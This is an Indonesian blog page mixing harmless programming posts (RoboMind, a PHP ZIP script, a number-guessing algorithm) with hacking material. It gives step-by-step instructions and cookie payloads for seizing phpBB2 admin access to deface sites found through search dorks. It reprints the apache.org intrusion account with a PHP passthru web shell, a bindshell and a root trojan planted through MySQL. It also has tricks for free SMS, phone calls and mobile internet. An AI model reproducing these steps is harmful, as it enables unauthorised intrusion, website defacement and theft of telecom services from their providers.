Video Tutorial (Hacking, Powerpoint dan lain-lain)
Posted OnHari ini aku akan menshare video tutrial yang berhubungan dengan komputer, Pada kesempatan ini aku hanya menshare dua video tutorial yaitu hacking dan penetration dan microsoft powerpoint, untuk hacking yang semula 198 Mb aku splt jadi 100 file kecil jadi yang sabar ya donlotnya.
Silahkan anda lanjutkan
Untuk mendownloadnya silahkan aja anda klik disini
jangan lupa beri komentar ya......
RoboMind, Game untuk Programmer Pemula
Posted OnBagi Anda seorang programmer pemula, ada sebuah game yang menarik buat Anda. Game yang menggabungkan konsep pemrograman dengan Robot. Mungkin game ini cocok pula bagi para programmer yang dulunya bercita-cita ingin membuat robot, namun tidak kesampaian :-). Game ini bernama RoboMind.
Robomind adalah sebuah game opensource tentang bagaimana mengendalikan pergerakan sebuah robot melalui perintah-perintah menggunakan bahasa pemrograman. Game yang dibuat oleh Arvid Halma dari Universitas Amsterdam ini dapat didownload di URL http://www.robomind.net
Mengapa game ini cocok bagi mereka yang baru belajar pemrograman? Ya… di dalam game ini, kita bisa mengatur sendiri langkah-per langkah kita untuk mengatur gerakan robot, dalam hal ini melatih kemampuan kita dalam penguasaan algoritma dan logika. Selain itu dalam RoboMind ini terdapat pula beberapa struktur pemrograman seperti halnya bahasa pemrograman pada umumnya, seperti bentuk IF, LOOPING, dan PROCEDURE.
Di dalam RoboMind, kita bisa menggerakkan robot untuk bergerak maju, mundur, belok kanan, kiri, mewarnai jalan yang dilalui, mencari sebuah obyek, mengambil sebuah obyek, dan meletakkan obyek melalui perintah-perintah berbentuk function.
Berikut ini beberapa perintah dasar untuk mengatur gerakan si robot.
- forward(n), digunakan untuk menggerakan maju si robot n langkah
- backward(n), digunakan untuk menggerakan ke belakang si robot n langkah
- left(), digunakan untuk membelokkan si robot ke kiri 90 derajad
- right(), digunakan untuk membelokkan si robot ke kanan 90 derajad
- north(n), digunakan untuk mengarahkan robot ke utara, lalu bergerak maju n langkah
- south(n), digunakan untuk mengarahkan robot ke selatan, lalu bergerak maju n langkah
- west(n), digunakan untuk mengarahkan robot ke barat, lalu bergerak maju n langkah
- east(n), digunakan untuk mengarahkan robot ke timur, lalu bergerak maju n langkah
Robot juga bisa disuruh mewarnai path yang dilalui, dengan perintah berikut ini
- paintWhite(), menyuruh robot mewarnai dengan warna putih pada path
- paintBlack(), menyuruh robot mewarnai dengan warna hitam pada path
- stopPainting(), menyuruh robot berhenti mewarnai
Selain mewarnai path yang dilalui, si robot juga bisa disuruh mengambil obyek dan meletakkannya kembali. Berikut ini beberapa perintah untuk melakukan hal tersebut:
- pickUp(), mengambil obyek yang ada di depannya
- putDown(), meletakkan obyek di depannya
Sedangkan untuk struktur pemrograman untuk bentuk IF, berikut ini sintaksnya:
if (syarat)
{
instruksi
}
atau
if (syarat)
{
instruksi
}
else {
instruksi
}
Bagaimana dengan bentuk loopingnya? Ada beberapa bentuk looping dalam RoboMind ini, ini dia macam-macam bentuk looping
repeat(n)
{
instruksi
}
Bentuk looping di atas digunakan untuk mengulangi instruksi sampai dengan n kali (mirip dengan struktur FOR i:=1 TO n DO dalam Pascal).
Ada pula bentuk looping seperti di bawah ini
repeatWhile(syarat)
{
instruksi
}
Struktur looping di atas mirip dengan struktur WHILE (syarat) DO dalam Pascal.
Di bawah ini contoh sebuah program untuk menyuruh robot mengikuti jalan berwarna putih.
# belok ke kanan
right()
# maju 8 langkah
forward(8)
# looping
repeat()
{
# cek apakah ada jalan berwarna putih di depannya
if(frontIsWhite()){
# jika ada, maka maju satu langkah
forward(1)
}
# cek apakah ada jalan berwarna putih di sebelah kanannya
else if(rightIsWhite()){
# jika ada, belok kanan
right()
}
# cek apakah ada jalan berwarna putih di sebelah kirinya
else if(leftIsWhite()){
# jika ada, belok kiri
left()
}
# cek apakah di depan robot ada halangan
else if(frontIsObstacle()){
# jika ada, robot berhenti (stop)
end
}
}
Apabila program di atas dijalankan, maka inilah hasil gerakan si robot.
OK… selamat belajar pemrograman sambil bermain robot.
Membuat Script PHP untuk Kompresi File ZIP
Posted OnDengan PHP, kita bisa membuat aplikasi sederhana untuk kompresi file ke dalam bentuk ZIP.
Mengapa kita harus bisa membuat script untuk kompresi file ini, toh di hampir setiap komputer sudah ada software kompresi, meskipun hasil crack-crack an :-). Untuk menjawab ini, saya ambil contoh penerapannya. Kalau Anda merupakan adsense publisher, maka setiap interval waktu tertentu Anda akan dikirimi file report earning dalam format CSV yang terkompresi dalam bentuk ZIP file. Apakah setiap pegawai Google Adsense melakukan kompresi setiap laporannya dan mengirimkan satu-persatu file report ini ke semua publishernya secara manual via email? Saya yakin tidak… Mekanisme ini dibuat secara otomatis dengan menggunakan program atau script. Nah… ini salah satu contoh saja alasan mengapa kita juga harus bisa membuat aplikasi untuk kompresi file ZIP via web.
Alasan yang lain… misalkan Anda orang yang ‘baik’ dan tidak ingin menggunakan software crack-crack an untuk kompresi, maka Anda bisa membuat sendiri aplikasinya dengan PHP :-)
Pada tutorial ini akan dibahas bagaimana cara membuat script PHP untuk melakukan kompresi file ZIP. Skenario untuk studi kasus yang diambil di sini adalah: user nantinya akan memilih file yang akan dikompresi melalui form, setelah itu ia mengklik tombol submit, dan hasilnya akan diperoleh file kompresi ZIP dari file yang dipilih tadi. Simple bukan…
Oya… untuk PHP yang dijalankan di Windows OS, pastikan Anda telah mengaktifkan php_zip.dll di file php.ini. Bagaimana caranya? Caranya adalah buka terlebih dahulu file php.ini, bila Anda menggunakan AppServ caranya klik START > AppServ > Configuration Server > PHP Edit The php.ini Configuration File. Selanjutnya cari baris extension=php_zip.dll. Pastikan tidak ada tanda titik koma (;) di depan baris tersebut. Bila sudah, simpan kembali php.ini, dan restart Apache (Web Server).
Nah… sekarang kita mulai membuatnya.
Pertama-tama kita buat form untuk memilih file yang akan dikompresi.
Selanjutnya kita buat script kompresi.php nya.
1 | |
Keterangan:
- Baris ke-3 digunakan untuk mendapatkan nama file yang akan dikompresi. Nama file ini nanti akan digunakan untuk memberi nama file hasil kompresi (lihat baris ke-11).
- Baris ke-4 digunakan untuk menyimpan temporary file yang akan dikompresi. File temporary ini nantinya akan dibaca isinya (baris ke-6 s/d 8).
- Baris ke-10 digunakan untuk membuat obyek ZipArchive.
- Baris ke-13 digunakan untuk membuat file kompresi.
- Baris ke-14 melakukan pengecekan, bila file kompresi berhasil dibuat maka isi file asli yang dibaca akan dimasukkan ke dalam file kompresi. Sedangkan bila gagal, muncul pesan kegagalan.
Dari contoh ini, Anda bisa kembangkan sendiri bagaimana jika kita ingin mengkompresi beberapa file menjadi satu.
OK… mudah-mudahan info bermanfaat.
Tips Sukses Belajar Pemrograman
Posted On“Saya sudah lama belajar pemrograman, tapi mengapa sampai saat ini kok tidak bisa-bisa ya Pak?”. Pertanyaan itu sering dilontarkan kepada saya dari banyak orang, baik lewat YM maupun email. Ada lagi yang menanyakan, “Apa modal dasar belajar pemrograman Pak?”. Masih banyak lagi tipe-tipe pertanyaan lain yang senada.
Dalam artikel kali ini saya akan memaparkan beberapa tips bagaimana cara sukses belajar pemrograman.
Tidak tahu mengapa, bahwa ilmu tentang pemrograman ini gampang-gampang susah. Gampang ketika dijelasin cara bikin program oleh sang dosen. OO…. ternyata cuman gitu aja to… Tapi kalau ada tugas atau disuruh bikin program dari suatu studi kasus tertentu, banyak yang mengeluh… wah kok sulit ya… trus ujung-ujungnya copas miliknya teman :-(
Memang modal dasar pemrograman hanyalah penguasaan pada logika dan algoritma. Pelajaran logika, telah kita terima di pelajaran matematika SMU. So.. saya yakin para programmer pemula pasti sudah menguasai hal ini. Nah… yang terpenting adalah algoritma.
Perlu menjadi catatan di sini adalah, algoritma bukanlah teori maupun rumus yang perlu dihapalkan. Untuk belajar algoritma, perlu banyak waktu dan latihan. Tips untuk belajar algoritma hanyalah dengan memperbanyak latihan bagaimana mencari langkah-langkah solusi secara logis. Kalau perlu buat masalah sendiri dan cari langkah solusinya. Selain itu jangan hanya puas dengan mengerjakan tugas dari dosen. Karena tugas dari dosen itu scope nya kecil… masih banyak hal lain di luar tugas dosen yang perlu dieksplorasi.
Nah… terkadang, programmer pemula kesulitan dalam mengekspresikan algoritma yang ada di benaknya ke dalam bentuk algoritma pemrograman. Misalnya “Pak… saya sebenarnya tahu cara mencari nilai n faktorial, tapi kok rasanya sulit mengekspresikan ke dalam algoritma pemrogramannya?”. Hal ini juga perlu banyak latihan dan juga dengan melihat banyak contoh-contoh algoritma yang ada. Pelajari bagaimana teknik pengekspresian algoritma.
Terkadang… untuk menentukan algoritma penyelesaian suatu kasus itu muncul karena insting sang programmer. Nah… insting ini muncul kalo penguasaan atau jam terbang sang programmer sudah banyak.
Setelah konsep algoritma ini dikuasai, silakan Anda memilih salah satu jenis bahasa pemrograman yang disukai. Pada prinsipnya, jika konsep algoritma sudah dipegang, mau pindah ke bahasa pemrograman apapun bisa, karena bila sudah masuk ke bahasa pemrograman, fokusnya ke penguasaan sintaks atau aturan penulisan perintah. Nah.. sintaks ini bisa dihapalkan.
Saran saya, sebaiknya kita menguasai lebih dari satu bahasa pemrograman. Mengapa demikian? Ya… karena lapangan kerja tidak hanya membutuhkan satu jenis bahasa pemrograman saja. Misalnya perusahaan X butuh programmer Java, sedangkan perusahaan Y butuh programmer C++ dsb. Semakin banyak bahasa pemrograman yang kita kuasai, maka semakin baik dan bisa lebih berpotensi bagi karir kita.
Ok mudah-mudahan berguna bagi Anda para new comer di bidang programmer.
Satu lagi saran saya… “JANGAN MUDAH MENYERAH”.
Rahasia Dibalik Cara Pembuatan Program Tebak Angka
Posted OnKebanyakan mahasiswa mengira bahwa komputer benar-benar mengetahui isi hati dan pikiran mereka, padahal sebetulnya tidak. Dalam hal ini algoritma dan logikalah yang berperan. Melalui serangkaian input dan proses serta perhitungan, komputer akan menghasilkan output berupa yang angka yang dipilih si mahasiswa.
Banyak di antara mahasiswa yang penasaran dengan logika dan algoritma yang saya gunakan untuk membuat program menebak angka tersebut. Dan… sekarang saatnya saya buka rahasianya.
OK.. untuk menyederhanakan permasalahan, saya akan persempit dulu scope bilangannya yaitu antara 0 s/d 7. Oya.. perlu diketahui bahwa permainan tebak angka ini hanya berlaku untuk bilangan antara 0 s/d 2^n-1, dengan n nya bilangan bulat positif. Lho kenapa harus seperti itu? Iya… karena n ini terkait dengan jumlah bit biner suatu bilangan. Misalkan kita pilih jumlah bit biner untuk permainan tebak angka ini adalah 3, maka dengan jumlah bit tersebut akan diperoleh bilangan-bilangan
0 = 000
1 = 001
2 = 010
3 = 011
4 = 100
5 = 101
6 = 110
7 = 111
Dengan demikian, apabila dipilih n = 3, maka permainan tebak angka ini hanya berlaku untuk bilangan 0 s/d 7 (8 bilangan) saja.
OK… setelah diketahui bilangan biner untuk masing-masing bilangan 0 s/d 7, selanjutnya mengelompokkan ke-delapan bilangan tersebut berdasarkan bit-bit yang bernilai 1. Misalkan untuk bilangan yang memiliki bit pertama bernilai 1 adalah 4, 5, 6, dan 7. Sedangkan untuk bit kedua bernilai 1 adalah 2, 3, 6, dan 7. Dan bit ketiga bernilai 1 adalah 1, 3, 5 dan 7.
Selanjutnya, untuk setiap kelompok tersebut ditampilkan bilangan-bilangannya dan diberikan pertanyaan kepada user. Berikut ini bentuk pertanyaannya (untuk kelompok bilangan dengan bit pertama bernilai 1):
Apakah bilangan yang Anda pilih ada diantara angka-angka berikut ini?
4 5 6 7
Ya atau Tidak?
Berikutnya pertanyaan untuk kelompok bit kedua yang bernilai 1.
Apakah bilangan yang Anda pilih ada diantara angka-angka berikut ini?
2 3 6 7
Ya atau Tidak?
Hal yang sama juga berlaku untuk pertanyaan pada kelompok bilangan dengan bit ketiga bernilai 1.
Lantas, bagaimana komputer bisa menebak angka yang dipilih oleh user? Caranya cukup mudah yaitu dengan merangkai nilai setiap bit yang diperoleh pada setiap pertanyaan. Sebagai contoh misalnya untuk pertanyaan pertama user menjawab ‘Ya’, maka bit pertama bernilai 1, pertanyaan kedua user menjawab ‘tidak’ (bit kedua bernilai 0) dan pertanyaan ketiga dijawab ‘Ya’ (bit ketiga bernilai 1), maka bilangan yang dipilih oleh user memiliki bit biner 101, dalam hal ini adalah bilangan 5.
Nah penjelasan di atas dapat digeneralisasi untuk n digit biner. Mau tahu source code program tebak angka versi Pascal? Silakan download source code di bawah ini
Rahasia Internet Gratis Dengan Fren Dibongkar
Posted OnGratisan
Mau tahu caranya akses internet gratis!!
Nih..saya bongkar habis-habisan rahasianya untuk Anda yang ingin mengakses internet gratis tanpa biaya sepeserpun (kecuali biaya listrik kali yee..)
1. Sarana / Peralatan
- Handpone CDMA + kabel data yang mendukung fitur port USB (misal, Nokia 6235, 6016, 2116 dll) pokoknya yang bisa koneksi ke komputer Anda (saya menyarankan Nokia 6235 karena akses modem internalnya cukup baik).
- CDMA wireless modem (misal, venus VT-21), kebetulan ini yang saya gunakan sampai sekarang.
- Kartu prabayar “Fren” (gunakan terus sampai pulsanya habis dan selanjutnya tidak perlu diisi ulang walaupun masa aktif pulsa sudah habis, saya jamin ga ada masalah kok.
2. Software Pendukung
- Browser Mozzila Firefox - Silahkan download disini gratis Google Toolbar with Firefox
- Flashplayer
Sekarang kita mulai dengan instalasi .
- Instal Mozzila Firefox dan Flashplayer di komputer Anda, jika sudah tersedia tidak perlu dilakukan.
- Jika Anda menggunakan Wireless modem CDMA, instalasi dulu softwarenya.
- Buka browser Firefox,
Lihat menu bar, klik tools - option - advanced - klik setting dan selanjutnya anda masuk pada area “configure proxies to acces the internet”
Centang Manual proxy configuration :
Isikan ini,
HTTP Proxy : 66.198.41.11
Port : 3128
selanjutnya centang Use this proxy server for all protocols
kosongkan pada tulisan No proxy for : dan Automatic configuration proxy URL :
Klik Ok….Anda sudah selesai melakukan setting pada browsing firefox.
3. Koneksi Ke Internet
Disini saya hanya menjelaskan untuk system Window XP,
- Klik star - control panel - buka Network Connections“
- Klik Create a New Connection - Next
- Centang Connect to the Internet - Next
- Centang Set up my connection manually - Next
- Centang Connect using a dial-up modem - Next (Selanjutnya masuk pada pilihan modem yang digunakan)
- Centang pilihan modem yang digunakan - Next
- Isi ISP Name : Misal “Fren” (terserah Anda tidak ada aturan baku) - Next
- Isi Phone Number : #777 - Next
- selanjutnya masuk pada Internet account information, isikan
User name : m8
Password : m8
Confirm password : m8
Dibawahnya ada 2 pilihan default dan use this account (silahkan centang bergantung kebutuhan Anda, jika koneksi ini dijadikan pilihan utama, tinggal klik default) selanjutnya Next - Finish
Anda telah selesai membuat koneksi ke internet…
Nah..Sekarang Anda sudah siap untuk browsing…syuurr…gratis…Asyik kan…..
Eitt…nanti dulu…Itu kan..kata yang empunya website internet gratis yang meski bayar…yang katanya asyik berinternet ria tanpa biaya….
Nih…Saya tunjukan masalah yang akan muncul sebenarnya :
1. Ketika koneksi pertama dilakukan (misalkan Anda browser ke http://www.google.com) akan muncul pesan “Unable to find the proxy server”
Nah..Anda harus bersabar dulu dan lakukan terus koneksi berulang sampai browser Anda berhasil loading ke halaman website.
2. Proxy yang saya terima dari penjual website internet gratis, tidak ada yang bisa di pake sama sekali…lha wong.. tiap koneksi langsung jepret…mati..”Not Connected” kata komputer saya.
Tapi..khabar baiknya..saya mendapatkan proxy gratis yang cukup handal digunakan dan bisa mengakses ke 128 bit berbasis SSL atau HTTPS….dan enaknya bisa untuk buka kirim Gmail dan yahoo, bisa buka klikbca dll.
3. Walaupun saya sudah menggunakan proxy yang terbaik, akan tetapi tetap saja tidak bisa browser berlama-lama….Kenapa coba…mau tahu…nih saya buka lagi rahasianya (bagi yang tidak tahu yah…)
Kartu prabayar Fren memberikan akses internet gratis 30-45 detik…Nah…peluang ini yang lantas dipake untuk bisnis internet yang mempunyai nilai dijual dan dibesar-besarkanlah sama empunya website….apakah ini sebuah trik…I don’t know..lah…moga-moga aja yang empunya website tidak marah sama saya…lha.. wong saya sendiri bayar kok ama pengelolanya…
4. Kesimpulannya Anda hanya bisa browser selama +/- 30 detik untuk membuka satu halaman website, selanjutnya Anda harus disconected dari koneksi anda dan ulangi lagi dial connected…
Simpelnya…1 kali buka website 1 kali koneksi…langsung jepret….
5. Bagaimana dengan speed?
Ini semua tergantung dari jaringan di wilayah Anda sendiri, dan kebetulan saya berdomisili di Bandung cukup baik bisa mencapai 230 kbps dan jika Anda ingin tahu speed akses internet Anda yang sebenarnya, coba deh download softwarenya (namanya NetMeter), silahkan akses di : www.metal-machine.de/readerror/
Sekali lagi saya tegaskan, apakah bisa di akses atau tidaknya internet gratis ini bergantung dari jarinagn di wilayah Anda (kalau memang jaringan Anda cukup baik…selamat deh..)
6. Bagaimana kalau websitnya loadingnya lambat….ya..udah kelaut aje…
Tapi…Manfaat dan keuntungannya ada juga lho…
Faktanya…ini sih..kalau Anda percaya sama saya….Blog ini dibuat dan diciptakan sampai bisa diakses di internet atas jasa internet gratis ciptaan saya sendiri…Belive it Or Not…terserah Anda yang menilai.
Namun cara tersebut masih membuat kita merasa tidak begitu nyaman.
Contohnya kita harus olahraga jari setiap kali connect ke internet.Karena kita harus menekan tombol "tutup telpon" tiap kali kita ingin konek internet.
Oleh karena itu saya ingin memberikan tips2 agar internet gratis tersebut menjadi sedikit lebih nyaman.
2. Gunakan Autodialrun.
Tool ini memungkinkan kita untuk melakukan connect ataupun disconnect, tanpa harus
menekan tombol "tutup telpon". silakan download di ftp://ftp.freenet.de/pub/filepilot/windows/internet-tools/AutoDialUp3.6.2.0..zip
3. Pada network settingnya pilih properties trus Set redial timenya menjadi 1 detik. Ini akan membantu agar saat konek ke internet kita tidak perlu menunggu lama untuk melakukan redial.
4. Gunakan down them all.
tool ini semacam download manager, adalah ekstensi tambahan dari mozilla firefox.cari saja downthemall.net atau di situsnya mozilla firefox. Mengapa saya menyarankan untuk menggunakan tool ini? karena tool ini terintegrasi langsung dengan
mozilla, saya pernah mencoba menggunakan IDM, tapi downloadnya selalu gagal tiap kali disconnect. Untuk download sebaiknya
jangan mencoba download di situs penyedia upload data, seperti rapidshare,ziddu,kitaupload,bizzhat,dll.
5. Gunakan browser mozilla firefox 3.0.
browser ini sepertinya merupakan browser terbaik saat ini. Karena kita membuthkan 30 detik untuk menampilkan situs yang akan kita akses, maka browser ini lumayan bisa menjawab permasalahan tersebut. Jika website yang anda akses tidak juga muncul, jangan khawatir coba pilih work offline, nah situs yang kita akses akan muncul meskipun tidak 100%. Tapi biasanya seluruh text nya sudah tampak.
6. Gunakan switchproxy
tool ini digunakan untuk merubah proxy yang kita gunakan ke proxy yang lain. Hal ini dibutuhkan jika terjadi gangguan pada
proxy yang sedang kita gunakan, maka kita dapat menggantinya dengan proxy lainnya dengan cepat. Untuk
Proxy ini dapat digunakan untuk mengakses email, friendster,dll.
Tp seandainya proxy ini error ganti saja dengan proxy lainnya. Untuk proxy lainnya akan saya kasih di posting selanjutnya.
7. Gunakan proxy webwsite.
Proxy website digunakan untuk mengakses situs situs yang sulit diakses dengan proxy yang dipakai, misalnya www.blogger.com, mail.google.com dll. Ada banyak webproxy misalnya:
1. Proxybypass.bizz
2. Keepbrowse.com
3. Proxyspeeds.com
Cari saja di google buanyak..
Cara Agar Friendster dan Situs Tertentu Tidak DiBlok Kampus
Posted OnJika kampus anda membatasi hak akses anda terhadap situs situs tertentu seperti friendster, ataupun situs situs yang mengandung unsur kekerasan, pornografi dan lain lain. Berikut ada trik yang mungkin membantu anda untuk mem-bypass akses internet anda dari proteksi yang dilakukan kampus.
Sebenarnya ada beberapa trik yang saya ketahui, tapi untuk kali ini saya berikan cara yang paling mudah.
Cara termudah yaitu menggunakan website proxy. website proxy adalah website yang dibuat khusus agar kita dapat mengakses situs situs tertentu dengan IP adress dari web site proxy tersebut. Diantaranya :
1. Proxyspeeds.com
2. Keepbrowse.com
3. Proxybypass.biz
Tampilan awal website tersebut akan terdapat sebuah kolom, masukkan saja website yang akan kita akses pada kolom tersebut, misalnya friendster.com, kemudian enter. Nah anda sudah bisa mengakses website yang diblok oleh kampus anda.
Cara kedua adalah menggunakan proxy transparent, yaitu proxy yang dapat mengakses website yang menggunakan ssl, seperti friendster, yahoomail,blogger.com, dll. Berikut proxy transparent yang saya gunakan untuk koneksi internet gratis ala FREN :
1. 66.198.41.11 : 3128
2. 118.98.163.182 : 3128
3. 83.111.180.1 : 3128
4. 85.217.183.27 : 31218
Untuk cara penggunaanya silakan klik disini
Defacing
Posted OnLangkah-Langkah Deface PHPBB/PHPBB2 Loser_cs_20
1. Download browser Mozilla FireFox
2. Download pluginnya yg bernama LiveHTTPHeader
download di http://livehttpheaders.mozdev.org/installation.html
cari yg paling baru
3. selanjutnya cari target dengan Uncle Google dgn syntax :
phpBB site:[terserah apa aja]
4. setelah itu buka plugin yg kita download tadi di Tools -> LiveHTTPHeader
5. Ingat, isi LiveHTTPHeader harus kosong
6. buka situs target, dengan begitu LiveHTTPHeader akan mengambil semua cookie yg tercatat di halaman target
7. setelah halaman sukses terbuka ditandai dengan tanda "done" di bawah browser, langkah selanjutnya adalah mengklik LiveHTTPHeader di bagian tengahnya dilanjutkan mengklik opsi Replay..
8. setelah LiveHTTPReplay terbuka liat bagian seperti dibawah ini pada LiveHTTPReplay...
Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=88da2bbdc1a3a789df094d50d91f7e3b
9. Hapus bagian yg belakang setelah tanda semi colon (
Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=88da2bbdc1a3a789df094d50d91f7e3b
\_______________hapus bagian ini_________________/
jadinya akan seperti ini :
Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D
10. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi
11. selanjutnya perhatikan langkah di bawah ini:
Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D
\________hapus bagian ini dan di ganti dengan:
Cookie: phpbb2mysql_data=a:2{s:11:"autologinid";s:32:"602baahpepms74d4cb6f2d012e1e4019";s:6:"userid";s:1:"2";}
12. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi tadi.
13. perhatikan lagi langkah ini:
Cookie: phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"602baahpepms74d4cb6f2d012e1e4019";s:6:"userid";s:1:"2";}
\___________________________bagian ini jg digantilagi_______________________________/
menjadi seperti ini:
Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
14. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi tadi.
15. selesai, silakan liat halaman target, kalo anda beruntung anda mendapatkan full admin.
Silakan pergi ke bawah halaman dan lihat opsi "Go To Administration Panel" telah muncul
How To Deface APACHE
Posted On/*
* Before you start reading
*/
This paper does _not_ uncover any new vulnerabilities. It points out common
(and slightly less common) configuration errors, which even the people at
apache.org made. This is a general warning. Learn from it. Fix your systems,
so we won't have to :)
/*
* introduction
*/
This paper describes how, over the course of a week, we succeeded in
getting root access to the machine running www.apache.org, and changed
the main page to show a 'Powered by Microsoft BackOffice' logo instead
of the default 'Powered by Apache' logo (the feather). No other changes
were made, except to prevent other (possibly malicious) people getting in.
Note that the problems described in this paper are not apache-related,
these were all config errors (one of 'm straight from BugZilla's README,
but the README had enough warnings so I don't blame the BugZilla developers).
People running apache httpd do not need to start worrying because of
anything uncovered herein.
We hacked www.apache.org because there are a lot of servers running apache
software and if www.apache.org got compromised, somebody could backdoor
the apache server source and end up having lots of owned boxes.
We just couldn't allow this to happen, we secured the main ftproot==wwwroot
thing. While having owned root we just couldnt stand the urge to put that
small logo on it.
/*
* ftproot == wwwroot
* o+w dirs
*/
While searching for the laters apache httpserver to diff it the with
previous version and read that diff file for any options of new buffer
overflows, we got ourselves to ftp://ftp.apache.org. We found a mapping of
the http://www.apache.org on that ftp including world writable directories.
So we wrote a little wuh.php3 including
passthru($cmd);
?>
and uploaded that to one of the world writable directories.
/*
* Our commands executed
*/
Unsurprisingly, 'id' got executed when called like
http://www.apache.org/thatdir/wuh.php3?cmd=id
Next was to upload some bindshell and compile it like calling
http://www.apache.org/thatdir/wuh.php3?cmd=gcc+-o+httpd+httpd.c and then
executing it like calling http://www.apache.org/thatdir/wuh.php3?cmd=./httpd
/*
* The shell
*/
Ofcourse we used a bindshell that first requires ppl to authenticate with
a hardcoded password (:
Now we telnet to port 65533 where we binded that shell and we have local
nobody access, because cgi is running as user nobody.
/*
* The apache.org box
*/
What did we find on apache.org box:
-o=rx /root
-o=rx homedirs
apache.org is a freebsd 3.4 box. We didn't wanted to use any buffer
overflow or some lame exploit, goal was to reach root with only
configuration faults.
/*
* Mysql
*/
After a long search we found out that mysql was
running as user root and was reachable locally. Because apache.org was
running bugzilla which requires a mysql account and has it
username/password plaintext in the bugzilla source it was easy to
get a username/passwd for the mysql database.
We downloaded nportredird and have it set up to accept connections on
port 23306 from our ips and redir them to localhost port 3306 so we could
use our own mysql clients.
/*
* Full mysql access
* use it to create files
*/
Having gained access to port 3306 coming from localhost, using the login
'bugs' (which had full access [as in "all Y's"]), our privs where
elevated substantially. This was mostly due to sloppy reading of the BugZilla
README which _does_ show a quick way to set things up (with all Y's) but
also has lots of security warnings, including "don't run mysqld as root".
Using 'SELECT ... INTO OUTFILE;' we were now able to create files
anywhere, as root. These files were mode 666, and we could not overwrite
anything. Still, this seemed useful.
But what do you do with this ability? No use writing .rhosts files - no
sane rshd will accept a world-writable .rhosts file. Besides, rshd
wasn't running on this box.
/*
* our /root/.tcshrc
*/
Therefore, we decided to perform a trojan-like trick. We used database
'test' and created a one-column table with a 80char textfield. A couple
of inserts and one select later, we had ourselves a /root/.tcshrc with
contents similar to:
#!/bin/sh
cp /bin/sh /tmp/.rootsh
chmod 4755 /tmp/.rootsh
rm -f /root/.tcshrc
/*
* ROOT!!
*/
Quite trivial. Now the wait was for somebody to su -. Luckily, with 9
people legally having root, this didn't take long. The rest is trivial
too - being root the deface was quickly done, but not until after a
short report listing the vulnerabilities and quick fixes was build.
Shortly after the deface, we sent this report to one of the admins.
/*
* Fix that ftproot==wwwroot
*/
Another thing we did before the deface, was creating a file 'ftproot' in
the wwwroot (which was also ftproot), moving 'dist' to 'ftproot/dist'
and changing the ftproot to this new 'ftproot' dir, yielding the
world-writable dirs unexploitable but allowing ftp URLs to continue
working.
/*
* What could have been compromised?
*/
Remember the trojaned tcp_wrappers on ftp.win.tue.nl last year? If we
wanted to, we could have done the same thing to Apache. Edit the source
and have people download trojaned versions. Scary, eh?
/*
* In short:
*/
- ftproot==webroot, worldwritable dirs allowing us to upload and execute
php3 scripts
- mysqld running as root, with a FFULL RIGHTS login without a password.
/*
* Compliments for the Apache admin team
*/
We would like to compliment the Apache admin team on their swift
response when they found out about the deface, and also on their
approach, even calling us 'white hats' (we were at the most 'grey hats'
here, if you ask us).
BUG SMS Satelindo
Posted OnTeknologi SMS sekarang ini memang makin marak terlebih lagi dengan keadaan ekonomi yang Berantakan, solusi smslah yang lebih tepat dibanding menelpon yang sangat merobek kantong.
GSM yang menggunakan teknik switching dengan memanfaatkan system base station memungkinkan kita bisa mengirim pesan alphanumeric singkat dari sebuah Handphone ke handphone lain.
oke sampe disini preambule kita akhiri.
Kenapa dengan sms gratis yang dulu pernah populer sekarang telah susah ditemui?, itu pertanyaan yang sangat lazim terlontar dari pikiran kita semua yang mengandalkan sebuah promosi produk yang akhirnya menjadi komersil.
Bug yang saya dapatkan pada akhir bulan ini yaitu sebuah sms gratis dengan memanfaatkan kelemahan pada SATELINDO GSM. kenapa satelindo? nomor yang di keluarkan pihat SATELINDO yang baru dengan nomor seri depan 163***(misal +6281616378**) mempunyai bug yang dapat bermanfaat bagi kita untuk ber SMS gratis dengan sipengguna. Telah dicoba dari Simpati, mentari, proXL, dll tetap bisa dilakukan secara gratis.
cara sebagai berikut:
1. ketik SMS
2. kirim kenomor yang dituju ( misal: +6281616378** - tanpa bintang)
(yang saya dapatkan yaitu buug mentari versi 6163 <- diambil dari kode kartu dan nomor awal dari kartu mentari tersebut)
3. cara tulis nomor yang dituju menjadi 616378** (coba dgn nomor lain bila perlu)
4. tidak menggunakan karakter apapun yang ditambah pada nomor tujuan (karakter bintang hanya untuk menutupi nomor asli yang dituju.
4. dapat kita liat bahwa sms kita terkirim.
5. finish
Dari sana kita bisa lakukan dengan sepuas hati.
Tip n Trik Telepon Gratis
Posted OnI. Trik telphon gratis Lokal (dalam kota)
Fasilitas dan cara yang digunakan:
1. Telphone umum koin yang masih hidup
2. Pencet angka 1551 <--- catatan: angka 1 terakhir di pencet lama hingga ada nada "tut/nit/nada sela lainnya"
3. Bila tanda itu telah bunyi baru tekan nomor yang dituju ( nomor telphone lokal)
4. dan anda akan mendapatkan sambungan langsung dari telkom ke no telp yang dituju, maka anda bisa bicara sepuas bibir anda.
Note: Untuk nomor lokal yang tidak bisa dihubungi biasanya dikarenakan :
1. TERLALU BANYAK NOMOR YANG KEMBAR
2. TERLALU BANYAK ANGKA DOMINAN BESAR MISAL 8997896/89868789/ dll
3. DAN BILA TELEPHONE YANG DITUJU BELUM TERPASANG
4. TELKOM SEDANG KENA TROUBLE :))
II. TRIK TELEPHONE GRATIS INTERLOKAL (LUAR KOTA)
Fasilitas dan cara yang digunakan:
1. Telphone rumah, kantor atau wartel tipe B (sangat dianjurkan)
2. Telponlah seperti kita menelpon biasa ke NOMOR TUJUAN LUAR KOTA (khusus luar kota)
3. Bicaralah sepuas hati dan sebengkak bibir anda
4. Bila telah selesai percakapan ... PERHATIKAN TRIK INI:
TRIK 1. - SEBELUM ANDA MENUTUP TELEPHON, KETIKLAH NOMOR TUJUAN PERSIS SEPERTI NOMOR YANG DITUJU PERTAMA
